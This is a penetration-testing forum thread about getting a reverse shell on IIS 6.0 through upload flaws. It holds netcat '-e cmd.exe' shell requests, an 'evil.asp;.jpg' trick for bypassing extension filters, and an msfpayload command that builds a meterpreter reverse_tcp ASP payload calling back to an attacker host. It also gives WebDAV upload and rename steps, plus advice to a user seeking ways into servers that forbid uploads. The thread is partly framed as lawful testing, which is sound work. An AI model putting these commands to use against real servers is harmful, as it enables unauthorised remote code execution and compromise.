.

Reverse shell on IIS 6.0

<<

mn_kthompson

User avatar

Jr. Member
Jr. Member

Posts: 58

Joined: Tue Sep 19, 2006 1:59 pm

Location: Mankato, MN

Post Tue Sep 18, 2007 11:17 am

Reverse shell on IIS 6.0

I'll try to keep the backstory short on this.  We have an outside vendor that has developed a web-based application for one of our departments.  The application allows the logged on user to upload files into a directory that is accessible to the web server.  In other words, you can upload a file, and then point your browser at that file.  We have some concerns about this, so I decided to set up a test machine to test a potential vulnerability. 

I have set up IIS 6.0 on a virtual machine running a fully patched evaluation version of Windows Server 2003 and I set some ridiculously wide open permissions on the folder and whipped up an ASP.NET application that lets an anonymous user upload any file to the wwwroot directory.  I have verified that I was able to upload cmd.exe and nc.exe to the wwwroot directory.

The problem is, I can't seem to do anything with those files that I uploaded.  I have made sure that everyone has execute permission on the wwwroot folder, but I still can't seem to get a reverse shell.  I can't even seem to get a directory listing.  I tried putting this into my browser:
  Code:
http://134.29.32.249/cmd.exe?dir+c:\

but I keep getting a page cannot be displayed error.  I also tried:
  Code:
http://134.29.32.249/nc.exe?-l+-p+1001+-e+cmd.exe

which also hasn't worked.  Does anyone know IIS well enough to tell me what I've done wrong here?  Is there some setting that I haven't opened up so that the web server can run the exe?  Is there something wrong with the http request that I've sent to the server?
<<

LSOChris

Post Tue Sep 18, 2007 4:47 pm

Re: Reverse shell on IIS 6.0

try using the cmdasp.asp file

http://net-square.com/papers/one_way/one_way.html

it will execute as the IIS6 instance, so no SYSTEM privs but you should still be able to get a shell
<<

rebrov

User avatar

Full Member
Full Member

Posts: 130

Joined: Mon May 11, 2009 4:00 pm

Post Sat Jun 12, 2010 2:26 am

Re: Reverse shell on IIS 6.0

ChrisG wrote:try using the cmdasp.asp file

http://net-square.com/papers/one_way/one_way.html

it will execute as the IIS6 instance, so no SYSTEM privs but you should still be able to get a shell


i was about to make new thread asking how to this exploit how to get a shell on IIS 6.0 server ??

i tried to figure out the way in this site u mentioned but no luck

is there any proper way to do it i mean more explain from u ?
<<

KrisTeason

User avatar

Hero Member
Hero Member

Posts: 515

Joined: Sat Sep 08, 2007 7:48 pm

Location: /dev/null

Post Sat Jun 12, 2010 11:43 am

Re: Reverse shell on IIS 6.0

Maybe this may help - it's directly from ChrisG's blog
http://carnal0wnage.blogspot.com/2010/05/more-with-metasploit-and-webdav.html
eCPPT (Silver/Gold), eWPT, GSEC, GISP, GCIH, OSCP, OSWP
<<

rebrov

User avatar

Full Member
Full Member

Posts: 130

Joined: Mon May 11, 2009 4:00 pm

Post Sun Jun 13, 2010 7:47 pm

Re: Reverse shell on IIS 6.0

xXxKrisxXx wrote:Maybe this may help - it's directly from ChrisG's blog
http://carnal0wnage.blogspot.com/2010/05/more-with-metasploit-and-webdav.html


thanks alot for the info and i want to ask somethings :

i found link at the same page and leading to some tips useful to me as the following :

$ cat happy.jpg evil.asp > "evil.asp;.jpg"

$ file "evil.asp;.jpg"
JPEG image data, JFIF standard 1.02

Now we upload our "evil.asp;.jpg" image to the web application. Since the extension ends in "jpg" and the contents of the file appear to be a valid JPEG, the web application accepts the file and renames it to "/images/evil.asp;.jpg"

at this part after i created the fake jpg file to upload to the web server as its real .asp script but he said upload this file to the server ??

1- how to upload the file to the server ?
2- how to know that it takes this directory at the server /images/ ?
3- and should i navigate to this directory location via browser ? or specific port via telnet ?
4- what should i do if the server doesn't allow users to upload ?

i hope u can answer this question cuz its gonna enlight me alot

thanks in advance
<<

rebrov

User avatar

Full Member
Full Member

Posts: 130

Joined: Mon May 11, 2009 4:00 pm

Post Sun Jun 13, 2010 7:56 pm

Re: Reverse shell on IIS 6.0

i found it at the page :
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.6.94 LPORT=443 R |
./msfencode -o tcp443meterp.asp
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)


upload it and rename it

dav:/davaroo/> put tcp443meterp.asp tcp443meterp.txt
Uploading tcp443meterp.asp to `/davaroo/tcp443meterp.txt':
Progress: [=============================>] 100.0% of 314810 bytes succeeded.
dav:/davaroo/> copy tcp443meterp.txt tcp443meterp.asp;.txt
Copying `/davaroo/tcp443meterp.txt' to `/davaroo/tcp443meterp.asp%3b.txt':  succeeded.
dav:/davaroo/> exit

he uploaded it to the server via what ? telnet ? at the part :

dav:/davaroo/> put tcp443meterp.asp tcp443meterp.txt

where to type this commands i dont understand this part clearly
<<

KrisTeason

User avatar

Hero Member
Hero Member

Posts: 515

Joined: Sat Sep 08, 2007 7:48 pm

Location: /dev/null

Post Sun Jun 13, 2010 8:25 pm

Re: Reverse shell on IIS 6.0

He used a webdav client called cadaver to upload the file. He provide a reference link below in his blog but you could get it here. You could use the webdav auxiliary modules to verify it's up and running.

To try to answer some of your questions above:
1- how to upload the file to the server?
A. If FTP allows anonymous access and allows you to upload files that'd be good. WebDav also allows you to upload files - look into cadaver.
2- how to know that it takes this directory at the server /images/ ?
A. You could use a tool like nikto to find out what type of files are allowed  to get uploaded. One of the webdav auxiliary modules may also give you some information regarding this.
3- and should i navigate to this directory location via browser ? or specific port via telnet ?
A. Reference Answer 1.
4- what should i do if the server doesn't allow users to upload ?
A. Try Harder™
Last edited by KrisTeason on Sun Jun 13, 2010 8:44 pm, edited 1 time in total.
eCPPT (Silver/Gold), eWPT, GSEC, GISP, GCIH, OSCP, OSWP
<<

rebrov

User avatar

Full Member
Full Member

Posts: 130

Joined: Mon May 11, 2009 4:00 pm

Post Sun Jun 13, 2010 10:49 pm

Re: Reverse shell on IIS 6.0

what if the webdav disabled ? i found out many exploits but most of them talking about exploiting via webdav 

but what if i can't via webdav because its disabled ?
<<

LSOChris

Post Sat Jun 19, 2010 8:47 am

Re: Reverse shell on IIS 6.0

i've reread this post a few times to try to find the question but i think you are asking other ways to get files on the server.

obviously the blog post is about exploiting webdav shares or writeable shares via normal windows networking.  you could also use some of those techniques if a site allows file uploads as well.  the same caveats would *usually* apply that you cant upload .exe or .asp(x) files in that case it the bypass method may still work for you.

hope that helps

Return to Network Pen Testing

Who is online

Users browsing this forum: No registered users and 2 guests

.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software